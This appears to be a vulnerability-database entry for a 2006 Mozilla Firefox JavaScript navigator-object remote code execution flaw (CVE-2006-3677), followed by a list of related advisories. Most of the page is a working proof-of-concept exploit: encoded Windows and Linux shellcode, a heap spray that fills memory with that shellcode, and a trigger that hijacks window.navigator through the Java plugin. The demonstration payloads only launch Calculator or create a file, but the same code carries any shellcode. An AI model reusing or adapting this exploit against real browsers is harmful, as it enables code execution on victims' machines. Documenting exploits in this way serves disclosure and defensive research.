Lucene search
RootSSV:5225HistoryOct 24, 2006 - 12:00 a.m.
Mozilla Firefox Javascript Navigator Object Remote Code Execution Vulnerability
2006-10-2400:00:00
Root
www.seebug.org
24
0.974 High
EPSS
Percentile
99.9%
No description provided by source.
// MoBB Demonstration
function Demo() {
// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677
// The Java plugin is required for this to work
// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;
// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000
var shellcode;
var addr;
var fill;
if (navigator.userAgent.indexOf('Linux i') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}
if (navigator.userAgent.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}
if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%cccc');
addr = 0xcccccccc;
}
var b = fill;
while (b.length <= 0x400000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}
if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}
Related
saint
saint
Mozilla Firefox JavaScript Navigator object vulnerability
2006-08-14 00:00:00
Mozilla Firefox JavaScript Navigator object vulnerability
2006-08-14 00:00:00
Mozilla Firefox JavaScript Navigator object vulnerability
2006-08-14 00:00:00
securityvulns
securityvulns
Netscape/K-Meleon/Flock JavaScript navigator Vulnerability
2006-08-02 00:00:00
checkpoint_advisories
checkpoint_advisories
seebug
seebug
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC
2006-07-28 00:00:00
Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC
2014-07-01 00:00:00
cve
cve
CVE-2006-3677
2006-07-27 19:04:00
CVE-2008-0729
2008-02-12 21:00:00
exploitpack
exploitpack
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
2006-07-28 00:00:00
packetstorm
packetstorm
Mozilla Suite/Firefox Navigator Object Code Execution
2009-10-27 00:00:00
ubuntucve
ubuntucve
CVE-2006-3677
2006-07-27 00:00:00
zdi
zdi
Mozilla Firefox Javascript navigator Object Vulnerability
2006-07-26 00:00:00
cert
cert
Mozilla fails to properly release JavaScript references
2006-07-27 00:00:00
mozilla
mozilla
Javascript navigator Object Vulnerability — Mozilla
2006-07-25 00:00:00
debiancve
debiancve
CVE-2006-3677
2006-07-27 19:04:00
exploitdb
exploitdb
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
2006-07-28 00:00:00
prion
prion
Design/Logic Flaw
2008-02-12 21:00:00
openvas
openvas
Gentoo Security Advisory GLSA 200608-03 (Firefox)
2008-09-24 00:00:00
Gentoo Security Advisory GLSA 200608-03 (Firefox)
2008-09-24 00:00:00
Ubuntu: Security Advisory (USN-327-1)
2022-08-26 00:00:00
ubuntu
ubuntu
firefox vulnerabilities
2006-07-28 00:00:00
nessus
nessus
Firefox < 1.5.0.5 Multiple Vulnerabilities
2006-07-27 00:00:00
openSUSE 10 Security Update : seamonkey (seamonkey-1952)
2007-10-17 00:00:00
GLSA-200608-03 : Mozilla Firefox: Multiple vulnerabilities
2006-08-04 00:00:00
gentoo
gentoo
Mozilla Firefox: Multiple vulnerabilities
2006-08-03 00:00:00
Mozilla SeaMonkey: Multiple vulnerabilities
2006-08-03 00:00:00
suse
suse
remote code execution in MozillaFirefox,MozillaThunderbird,Seamonkey
2006-08-16 15:11:18
centos
centos
seamonkey security update
2006-08-04 20:56:41
firefox security update
2006-07-29 11:51:13
thunderbird security update
2006-07-29 11:51:27
freebsd
freebsd
mozilla -- multiple vulnerabilities
2006-07-25 00:00:00
redhat
redhat
(RHSA-2006:0608) seamonkey security update
2006-07-27 00:00:00
(RHSA-2006:0611) thunderbird security update
2006-07-28 00:00:00
(RHSA-2006:0610) firefox security update
2006-07-28 00:00:00
oraclelinux
oraclelinux
Critical firefox security update
2006-12-07 00:00:00
Critical thunderbird security update
2006-12-07 00:00:00